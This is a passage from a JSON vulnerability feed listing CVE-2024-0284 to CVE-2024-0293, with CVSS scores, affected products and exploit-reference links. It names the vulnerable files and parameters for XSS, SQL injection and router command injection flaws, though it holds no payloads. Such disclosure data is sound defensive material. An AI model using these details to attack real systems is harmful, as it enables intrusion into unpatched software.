"https://vuldb.com/?ctiid.249838", "name" : "https://vuldb.com/?ctiid.249838", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249838", "name" : "https://vuldb.com/?ctiid.249838", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249838", "name" : "https://vuldb.com/?id.249838", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249838", "name" : "https://vuldb.com/?id.249838", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file party_details.php. The manipulation of the argument party_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249838 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-07T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0284", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2016.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249839", "name" : "https://vuldb.com/?ctiid.249839", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249839", "name" : "https://vuldb.com/?ctiid.249839", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249839", "name" : "https://vuldb.com/?id.249839", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249839", "name" : "https://vuldb.com/?id.249839", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as problematic. This issue affects some unknown processing of the file party_submit.php. The manipulation of the argument party_address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249839." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-07T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0285", "ASSIGNER" : "scy@openharmony.io" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md", "name" : "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md", "name" : "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:openatom:openharmony:4.0:*:*:*:-:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:openatom:openharmony:*:*:*:*:-:*:*:*", "versionStartIncluding" : "3.2.0", "versionEndIncluding" : "3.2.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-02T07:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0286", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing", "name" : "https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing", "name" : "https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249843", "name" : "https://vuldb.com/?ctiid.249843", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249843", "name" : "https://vuldb.com/?ctiid.249843", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249843", "name" : "https://vuldb.com/?id.249843", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249843", "name" : "https://vuldb.com/?id.249843", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file index.php#contact_us of the component Contact Form. The manipulation of the argument Name/Email/Message leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249843." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-07T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0287", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability5.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249848", "name" : "https://vuldb.com/?ctiid.249848", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249848", "name" : "https://vuldb.com/?ctiid.249848", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249848", "name" : "https://vuldb.com/?id.249848", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249848", "name" : "https://vuldb.com/?id.249848", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file itemBillPdf.php. The manipulation of the argument printid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249848." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-07T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0288", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability12.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249849", "name" : "https://vuldb.com/?ctiid.249849", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249849", "name" : "https://vuldb.com/?ctiid.249849", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249849", "name" : "https://vuldb.com/?id.249849", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249849", "name" : "https://vuldb.com/?id.249849", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Kashipara Food Management System 1.0. This affects an unknown part of the file rawstock_used_damaged_submit.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249849 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0289", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability14.md", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249850", "name" : "https://vuldb.com/?ctiid.249850", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249850", "name" : "https://vuldb.com/?ctiid.249850", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249850", "name" : "https://vuldb.com/?id.249850", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249850", "name" : "https://vuldb.com/?id.249850", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Kashipara Food Management System 1.0. This vulnerability affects unknown code of the file stock_entry_submit.php. The manipulation of the argument itemype leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249850 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0290", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/Food%20Management%20System%20SQL%20Injection%20Vulnerability15.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249851", "name" : "https://vuldb.com/?ctiid.249851", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249851", "name" : "https://vuldb.com/?ctiid.249851", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249851", "name" : "https://vuldb.com/?id.249851", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249851", "name" : "https://vuldb.com/?id.249851", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Kashipara Food Management System 1.0. This issue affects some unknown processing of the file stock_edit.php. The manipulation of the argument item_type leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249851." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0291", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/UploadFirmwareFile/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249857", "name" : "https://vuldb.com/?ctiid.249857", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249857", "name" : "https://vuldb.com/?ctiid.249857", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249857", "name" : "https://vuldb.com/?id.249857", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249857", "name" : "https://vuldb.com/?id.249857", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249857 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0292", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setOpModeCfg/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249858", "name" : "https://vuldb.com/?ctiid.249858", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249858", "name" : "https://vuldb.com/?ctiid.249858", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249858", "name" : "https://vuldb.com/?id.249858", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249858", "name" : "https://vuldb.com/?id.249858", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249858 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-08T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0293", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUploadSetting/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249859", "name" : "https://vuldb.com/?ctiid.249859", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249859", "name" : "https://vuldb.com/?ctiid.249859", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249859", "name" : "https://vuldb.com/?id.249859", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249859", "name" : "https://vuldb.com/?id.249859", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected by this vulnerability is the function setUploadSetting of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249859. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:lr1200gb_firmware:9.1.0u.6619_b20230130:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:lr1200gb:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", 